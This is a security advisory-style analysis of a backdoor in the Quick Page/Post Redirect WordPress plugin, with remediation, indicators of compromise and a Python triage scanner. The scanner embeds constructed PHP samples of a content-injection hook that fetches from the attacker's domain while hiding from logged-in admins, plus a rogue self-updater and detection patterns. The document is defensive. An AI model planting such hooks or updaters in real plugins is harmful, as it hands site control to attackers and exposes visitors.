Full Report
The Quick Page/Post Redirect plugin, installed on more than 70,000 WordPress sites, had a backdoor added five years ago that allows injecting arbitrary code into users' sites. [...]
Analysis Summary
# Vulnerability: Supply Chain Backdoor in Quick Page/Post Redirect Plugin
## CVE Details
- **CVE ID:** Pending (Not explicitly assigned in the report)
- **CVSS Score:** Estimated 9.8 (Critical)
- **CWE:** CWE-506 (Embedded Malicious Code), CWE-494 (Download of Code Without Integrity Check)
## Affected Systems
- **Products:** Quick Page/Post Redirect (WordPress Plugin)
- **Versions:**
- **5.2.1 and 5.2.2:** Shipped with a hidden self-updater that polled `anadnet[.]com` rather than WordPress.org for new releases.
- **5.2.3 (tampered build):** The build served from `w[.]anadnet[.]com` in March 2021, which added the passive backdoor. It carries the same version number as the 5.2.3 in the WordPress.org repository, so the version string alone does not distinguish the two.
- **Configurations:** Any WordPress site that ran 5.2.1 or 5.2.2 while the rogue updater was live in 2021 and so pulled the tampered 5.2.3 automatically, or that otherwise installed the plugin from that server.
## Vulnerability Description
From 2020 into 2021 the plugin carried a hidden self-update mechanism that bypassed the official WordPress.org repository and instead polled a third-party domain (`anadnet[.]com`) for new releases. In March 2021 that server pushed a tampered build, version 5.2.3, containing a passive backdoor.
The backdoor registers a filter on `the_content`, so whenever post content is rendered it fetches data from the attacker's server and splices it into the page output, primarily for "parasite SEO" spam. It runs only for logged-out visitors, so an administrator browsing the site while logged in never sees the injected content. The self-update mechanism also persists, which means whoever controls the domain can push arbitrary PHP to every site still running an affected version; the backdoor is "passive" only in that it waits for the server to supply content.
## Exploitation
- **Status:** Exploited in the wild. The tampered build was actually distributed; the backdoor has been dormant but remains present on roughly 70,000 sites.
- **Complexity:** Low for whoever controls the C2 domain; no interaction with the victim beyond the plugin's own outbound polling is required.
- **Attack Vector:** Network (supply chain; remote command and control over the plugin's update channel).
## Impact
- **Confidentiality:** Low as observed (only content injection has been seen), but High in potential: the update channel can deliver arbitrary PHP that runs with the web server's privileges and can read `wp-config.php` and the database.
- **Integrity:** High (arbitrary code execution and site content modification).
- **Availability:** Low as observed (the activity seen so far aims at persistence, not disruption), but High in potential for the same reason. The estimated 9.8 reflects this potential, not the observed SEO spam.
## Remediation
### Patches
- **Version 5.2.4:** A clean version was released on WordPress.org. The plugin was temporarily pulled from the directory pending review as of the report date, so it may not be installable or updatable through the normal channel. Do not rely on the version string: the tampered 5.2.3 reports the same number as the official one, so confirm that the installed files match a release sourced directly from WordPress.org, or remove the plugin.
### Workarounds
- **Uninstall:** Delete the plugin directory entirely rather than merely deactivating it, so no copy of the self-updater or the `the_content` hook remains on disk.
- **Firewall:** Block outbound requests from the web server to `anadnet[.]com` and its subdomains at the egress firewall or DNS resolver rather than inside WordPress, so that raw `curl` and `file_get_contents` calls are covered as well as the WordPress HTTP API. This cuts the C2 channel but does not remove the backdoor; treat it as a stopgap until the plugin is removed or replaced.
## Detection
- **Indicators of Compromise:**
- Outbound connections from the web server to `anadnet[.]com` or `w[.]anadnet[.]com`.
- Plugin files that hook `the_content` and make external `curl`, `file_get_contents` or `wp_remote_get` calls to domains outside WordPress.org, especially when gated on `is_user_logged_in()`.
- File hashes that differ from the official 5.2.3 tag in the WordPress.org plugin SVN.
- **Detection methods and tools:**
- Security scanners such as Wordfence or Sucuri may flag the unauthorized update mechanism; a clean scan is not proof of absence, so confirm with a file-level check.
- Manual inspection of the plugin's `quick-page-post-redirect.php` for unexpected remote update logic, and of every other `.php` file in the plugin directory for the patterns above.
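As an added worked example (not code from the plugin, the researchers, or the news report), the following Python triage script implements the checks described under Vulnerability Description and Detection above: it flags PHP files that combine a `the_content` filter with an outbound HTTP call and a login-state check, matches the `anadnet[.]com` indicator, flags custom self-updater hooks, and diffs SHA-256 hashes of an installed plugin against a reference manifest. The PHP samples inside it are constructed to mirror the behaviour the report describes and are not the real plugin's code; the `qppr_` function names, the `updates.example.invalid` host, and the use of `pre_set_site_transient_update_plugins` (the standard WordPress filter custom updaters use, not necessarily the hook this plugin used) are assumptions.

```python
"""Triage helpers for the Quick Page/Post Redirect backdoor report (added example,
not the plugin's or the researchers' code). Check 1 scans PHP for the indicators
described above; check 2 diffs SHA-256 hashes against a reference manifest."""
import hashlib
import os
import re
import tempfile

C2_DOMAINS = ("anadnet.com",)  # the only domain named in the report

# Regexes over raw PHP source. self_update_hook is the standard WordPress filter
# custom updaters use; the report does not name this plugin's hook (assumption).
INDICATORS = {
    "hooks_the_content": re.compile(r"add_filter\s*\(\s*['\"]the_content['\"]"),
    "remote_fetch": re.compile(r"\b(curl_init|curl_exec|file_get_contents|"
                               r"wp_remote_get|wp_remote_post|wp_remote_request)\s*\("),
    "login_state_gate": re.compile(r"\bis_user_logged_in\s*\("),
    "self_update_hook": re.compile(r"pre_set_site_transient_update_plugins"),
    "c2_domain": re.compile("|".join(re.escape(d) for d in C2_DOMAINS), re.I),
}

def scan_source(src: str) -> dict:
    """Return which indicators fire in one PHP file plus a coarse verdict."""
    hits = {name: bool(rx.search(src)) for name, rx in INDICATORS.items()}
    if hits["c2_domain"]:
        verdict = "ioc_match"                  # known C2 domain referenced
    elif hits["hooks_the_content"] and hits["remote_fetch"]:
        verdict = "content_injection_pattern"  # remote data flows into page output
    elif hits["self_update_hook"] and hits["remote_fetch"]:
        verdict = "custom_updater"             # update source outside WordPress.org
    else:
        verdict = "clean"
    return {"verdict": verdict, **hits}

def scan_plugin_dir(root: str) -> dict:
    """Scan every .php file under root; {relative path: result} for non-clean files."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in (n for n in files if n.endswith(".php")):
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                result = scan_source(fh.read())
            if result["verdict"] != "clean":
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = result
    return findings

def hash_tree(root: str) -> dict:
    """SHA-256 of every file under root, keyed by forward-slash relative path."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            manifest[os.path.relpath(full, root).replace(os.sep, "/")] = digest
    return manifest

def diff_manifest(installed: dict, reference: dict) -> dict:
    """Files whose hash differs from, were added to, or are missing from the reference."""
    return {
        "modified": sorted(p for p in installed if p in reference and installed[p] != reference[p]),
        "added": sorted(p for p in installed if p not in reference),
        "missing": sorted(p for p in reference if p not in installed),
    }

# Constructed PHP samples that mirror the behaviour the report describes. They are
# NOT the real plugin's code; the qppr_ names are invented for this example.
SAMPLE_BACKDOOR = r"""<?php
add_filter('the_content', 'qppr_inject');
function qppr_inject($content) {
    if (is_user_logged_in()) { return $content; }   // logged-in admins never see it
    $extra = wp_remote_retrieve_body(wp_remote_get('https://w.anadnet.com/c?h=' . $_SERVER['HTTP_HOST']));
    return $content . $extra;
}
"""
SAMPLE_UPDATER = r"""<?php
add_filter('pre_set_site_transient_update_plugins', 'qppr_check_update');
function qppr_check_update($transient) {
    $r = wp_remote_get('https://updates.example.invalid/qppr.json');  // not WordPress.org
    return $transient;
}
"""
SAMPLE_CLEAN = r"""<?php
add_filter('the_content', 'qppr_notice');
function qppr_notice($c) { return $c . '<p>' . esc_html(get_option('qppr_notice')) . '</p>'; }
"""

def demo() -> dict:
    """Stand-alone run: build a clean 'reference' tree and a tampered 'installed'
    tree in a temp directory, then return the findings and the manifest diff."""
    base = tempfile.mkdtemp(prefix="qppr-triage-")
    trees = {"reference": {"plugin.php": SAMPLE_CLEAN, "readme.txt": "fake readme\n"},
             "installed": {"plugin.php": SAMPLE_BACKDOOR, "readme.txt": "fake readme\n",
                           "updater.php": SAMPLE_UPDATER}}
    for tree, files in trees.items():
        os.makedirs(os.path.join(base, tree))
        for name, body in files.items():
            with open(os.path.join(base, tree, name), "w", encoding="utf-8") as fh:
                fh.write(body)
    inst, ref = os.path.join(base, "installed"), os.path.join(base, "reference")
    return {"findings": scan_plugin_dir(inst), "diff": diff_manifest(hash_tree(inst), hash_tree(ref))}

if __name__ == "__main__":
    print(demo())
```

To use it on a real site, point `scan_plugin_dir` at `wp-content/plugins/quick-pagepost-redirect-plugin/` and build the reference manifest by running `hash_tree` over an export of the official tag from the WordPress.org plugin SVN (assuming the tag name matches the version number, as is usual there). A `content_injection_pattern` verdict on its own is not proof of compromise, since legitimate plugins also pull remote data into content; the combination with a login-state gate, a hash mismatch, or the `anadnet[.]com` indicator is what warrants removal.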
## References
- **Vendor Advisory:** Plugin currently pulled from hxxps[://]wordpress[.]org/plugins/quick-pagepost-redirect-plugin/
- **Researcher Report:** hxxps[://]anchor[.]host/the-plugin-author-was-the-supply-chain-attacker/
- **News Source:** hxxps[://]www[.]bleepingcomputer[.]com/news/security/popular-wordpress-redirect-plugin-hid-dormant-backdoor-for-years/